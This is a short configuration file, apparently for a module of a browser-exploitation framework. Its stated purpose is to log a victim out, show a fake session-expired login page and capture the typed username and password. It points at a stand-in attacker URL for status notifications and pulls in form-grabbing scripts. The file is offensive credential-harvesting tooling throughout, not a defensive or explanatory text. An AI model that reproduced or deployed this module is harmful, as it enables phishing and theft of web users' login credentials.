[config]
statusurl=http://attacker/notification-script

[includes]
formgrabber = formgrabber/generic.js

[dependencies]
script = logoutandgrabform.js
jquery = jquery.js
include = common.js jquery.cookie.js jquery.ba-htmldoc.js

[about]
description = Logs out the user and shows the login form, grabbing the username and password

[locations]
; logout page can often be retrieved automatically
; logoutpage = logout.html
sessionexpiredpage = login.html
